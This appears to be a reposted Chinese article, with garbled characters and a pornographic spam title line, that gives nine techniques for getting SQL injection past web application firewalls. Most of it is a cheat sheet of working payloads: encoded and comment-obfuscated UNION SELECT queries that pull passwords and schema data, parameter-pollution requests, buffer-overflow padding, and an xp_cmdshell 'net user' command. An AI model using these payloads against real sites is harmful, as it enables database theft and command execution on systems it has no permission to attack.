自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

SQL注入 | 9種繞過Web應(yīng)用程序防火墻的方式

安全 應(yīng)用安全
WAF區(qū)別于常規(guī)防火墻,因為WAF能夠過濾特定Web應(yīng)用程序的內(nèi)容,而常規(guī)防火墻充當(dāng)?shù)膭t是服務(wù)器之間的安全門。通過檢查HTTP流量,它可以防止源自Web應(yīng)用安全漏洞的攻擊,如SQL注入,XSS,文件包含和安全配置錯誤。

Web應(yīng)用程序防火墻(WAF)的主要作用是過濾,監(jiān)控和阻止各類進出Web應(yīng)用程序的HTTP流量。WAF區(qū)別于常規(guī)防火墻,因為WAF能夠過濾特定Web應(yīng)用程序的內(nèi)容,而常規(guī)防火墻充當(dāng)?shù)膭t是服務(wù)器之間的安全門。通過檢查HTTP流量,它可以防止源自Web應(yīng)用安全漏洞的攻擊,如SQL注入,XSS,文件包含和安全配置錯誤。

[[222000]]

WAF是如何工作的?

  • 協(xié)議異常檢測:拒絕不符合HTTP標(biāo)準(zhǔn)的請求
  • 增強的輸入驗證:代理和服務(wù)器端驗證,而不僅僅是客戶端驗證
  • 白名單和黑名單
  • 基于規(guī)則和基于異常的保護:基于規(guī)則的更依賴黑名單機制,基于異常則更靈活
  • 狀態(tài)管理:關(guān)注會話保護還有:Cookie保護,反入侵規(guī)避技術(shù),響應(yīng)監(jiān)控和信息披露保護。

如何繞過WAF?

1. 當(dāng)我們在目標(biāo)URL進行SQL注入測試時,可以通過修改注入語句中字母的大小寫來觸發(fā)WAF保護情況。如果WAF使用區(qū)分大小寫的黑名單,則更改大小寫可能會幫我們成功繞過WAF的過濾。

http://target.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4

2. 關(guān)鍵字替換(在關(guān)鍵字中間可插入將會被WAF過濾的字符) – 例如SELECT可插入變成SEL

http://target.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4

3. 編碼

+ URL encode

  1. page.php?id=1%252f%252a*/UNION%252f%252a /SELECT 

+Hex encode

  1. target.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4…  
  2.    SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61)) 

+Unicode encode

  1. ?id=10%D6‘%20AND%2201=2%23     
  2.    SELECT 'Ä'='A'; #1 

4. 使用注釋

在攻擊字符串中插入注釋。例如,/*!SELECT*/ 這樣WAF可能就會忽略該字符串,但它仍會被傳遞給目標(biāo)應(yīng)用程序并交由mysql數(shù)據(jù)庫處理。

  1. index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4      
  2.    'union%a0select pass from users#  
  3. index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3   
  4.    ?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4… 

5. 某些函數(shù)或命令,因為WAF的過濾機制導(dǎo)致我們無法使用。那么,我們也可以嘗試用一些等價函數(shù)來替代它們。

  1. hex()、bin() ==> ascii()   
  2. sleep() ==>benchmark()   
  3. concat_ws()==>group_concat() 
  4.  substr((select 'password'),1,1) = 0x70   
  5.    strcmp(left('password',1), 0x69) = 1   
  6.      strcmp(left('password',1), 0x70) = 0   
  7.    strcmp(left('password',1), 0x71) = -1 
  8. mid()、substr() ==> substring()  
  9. @@user ==> user()  
  10. @@datadir ==> datadir() 

6. 使用特殊符號

這里我把非字母數(shù)字的字符都規(guī)在了特殊符號一類,特殊符號有特殊的含義和用法。

  1. + ` symbol: select `version()`; 
  2. + +- :select+id-1+1.from users; 
  3. + @:select@^1.from users; 
  4. +Mysql function() as xxx 
  5. +`、~、!、@、%、()、[]、.、-、+ 、|、%00 

示例

  1. ‘se’+’lec’+’t’   
  2.       %S%E%L%E%C%T 1   
  3.       1.aspx?id=1;EXEC(‘ma’+'ster..x’+'p_cm’+'dsh’+'ell ”net user”’)  
  4. ' or --+2=- -!!!'2   
  5.      id=1+(UnI)(oN)+(SeL)(EcT) 

7. HTTP參數(shù)控制

通過提供多個參數(shù)=相同名稱的值集來混淆WAF。例如 http://example.com?id=1&?id=’ or ‘1’=’1′ — ‘在某些情況下(例如使用Apache/PHP),應(yīng)用程序?qū)H解析最后(第二個) id= 而WAF只解析第一個。在應(yīng)用程序看來這似乎是一個合法的請求,因此應(yīng)用程序會接收并處理這些惡意輸入。如今,大多數(shù)的WAF都不會受到HTTP參數(shù)污染(HPP)的影響,但仍然值得一試。

+ HPP(HTTP Parameter Polution))

  1. /?id=1;select+1,2,3+from+users+where+id=1—   
  2.    /?id=1;select+1&id=2,3+from+users+where+id=1—   
  3.    /?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users 

HPP又稱做重復(fù)參數(shù)污染,最簡單的就是?uid=1&uid=2&uid=3,對于這種情況,不同的Web服務(wù)器處理方式如下:

+HPF (HTTP Parameter Fragment)

這種方法是HTTP分割注入,同CRLF有相似之處(使用控制字符%0a、%0d等執(zhí)行換行)

  1. /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--   
  2.   select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users— 

+HPC (HTTP Parameter Contamination)

RFC2396定義了以下字符:

  1. Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' () 
  2. Reserved : ; / ? : @ & = + $ , 
  3. Unwise : { } | \ ^ [ ] ` 

不同的Web服務(wù)器處理處理構(gòu)造得特殊請求時有不同的邏輯:

以魔術(shù)字符%為例,Asp/Asp.net會受到影響

8. 緩沖區(qū)溢出

WAF和其他所有的應(yīng)用程序一樣也存在著各種缺陷和漏洞。如果出現(xiàn)緩沖區(qū)溢出的情況,那么WAF可能就會崩潰,即使不能代碼執(zhí)行那也會使WAF無法正常運行。這樣,WAF的安全防護自然也就被瓦解了。

  1. ?id=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 

9. 整合繞過

當(dāng)使用單一的方式無法繞過時,我們則可以靈活的將多種方式結(jié)合在一起嘗試。

  1. target.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4…   
  2. id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– -   
  3. ?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e-- 
責(zé)任編輯:趙寧寧 來源: FreeBuf
相關(guān)推薦

2011-03-25 11:18:51

2011-03-23 09:31:46

2023-10-24 15:43:07

2011-09-10 20:33:58

Web應(yīng)用防火墻 PC規(guī)則遵從源代碼

2010-10-25 12:07:51

2020-11-17 19:19:20

MacOS蘋果防火墻

2020-05-28 09:51:11

Web安全WAF漏洞

2012-08-08 17:41:49

防火墻防火墻規(guī)則應(yīng)用程序簽名

2010-08-30 10:18:24

2010-05-24 17:49:56

2011-05-10 09:17:01

2011-02-17 18:30:25

2011-02-15 18:38:49

2010-07-07 20:06:53

2010-07-12 11:33:52

2021-06-25 18:35:30

Web應(yīng)用防火墻

2011-03-25 11:06:46

2012-11-11 14:33:53

2010-12-21 18:04:26

2010-07-12 11:41:55

點贊
收藏

51CTO技術(shù)棧公眾號